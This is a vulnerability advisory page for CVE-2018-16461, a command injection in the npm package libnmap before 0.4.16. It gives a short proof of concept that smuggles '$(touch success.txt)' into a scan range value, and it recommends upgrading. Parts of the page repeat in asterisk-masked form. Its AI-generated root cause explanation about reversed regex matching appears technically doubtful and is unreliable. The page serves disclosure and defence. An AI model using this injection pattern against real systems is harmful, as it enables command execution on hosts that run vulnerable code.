10

CVSS Score

Basic Information

CVE ID

CVE-2018-16461

GHSA ID

GHSA-7g2w-6r25-2j7p

EPSS Score

0.80205%

CWE

CWE-77

Published

11/1/2018

Updated

9/7/2023

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2018-16461

CVE-2018-16461: Command Injection in libnmap

Versions of libnmap before 0.4.16 are vulnerable to command injection.

Proof of concept

const nmap = require('libnmap');
const opts = {
    range: [
        'scanme.nmap.org',
        "x.x.$(touch success.txt)"
    ]
};
nmap.scan(opts, function(err, report) {
    if (err) throw new Error(err);

    for (let item in report) {
        console.log(JSON.stringify(report[item]));
    }
});

Recommendation

Update to version 0.4.16 or later

(GitHub Advisory)

10

CVSS Score

Basic Information

CVE ID

CVE-2018-16461

GHSA ID

GHSA-7g2w-6r25-2j7p

EPSS Score

0.80205%

CWE

CWE-77

Published

11/1/2018

Updated

9/7/2023

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

AV:N/AC:L/Au:N/C:C/I:C/A:C

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
libnmap	npm	< 0.4.16	0.4.16

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The key vulnerability stemmed from improper order in regex validation within the validation class. The patch shows a critical reversal from 'opts.ports.match(regex)' to 'regex.match(opts.ports)', indicating the original pattern allowed user input to be treated as executable regex. This function processes() user-supplied ports/range parameters that are directly used in nmap command construction, making it the injection vector. The POC's $(command) syntax would be interpreted during this validation phase when constructing system commands.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

V*rsions o* `li*nm*p` ***or* *.*.** *r* vuln*r**l* to *omm*n* inj**tion. Proo* o* *on**pt ```js *onst nm*p = r*quir*('li*nm*p'); *onst opts = { r*n**: [ 's**nm*.nm*p.or*', "x.x.$(tou** su***ss.txt)" ] }; nm*p.s**n(opts, *un

Reasoning

T** k*y vuln*r**ility st*mm** *rom improp*r or**r in r***x v*li**tion wit*in t** v*li**tion *l*ss. T** p*t** s*ows * *riti**l r*v*rs*l *rom 'opts.ports.m*t**(r***x)' to 'r***x.m*t**(opts.ports)', in*i**tin* t** ori*in*l p*tt*rn *llow** us*r input to

10

Basic Information

Concerned about an active attack path?

CVE-2018-16461: Command Injection in libnmap

Recommendation

10

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI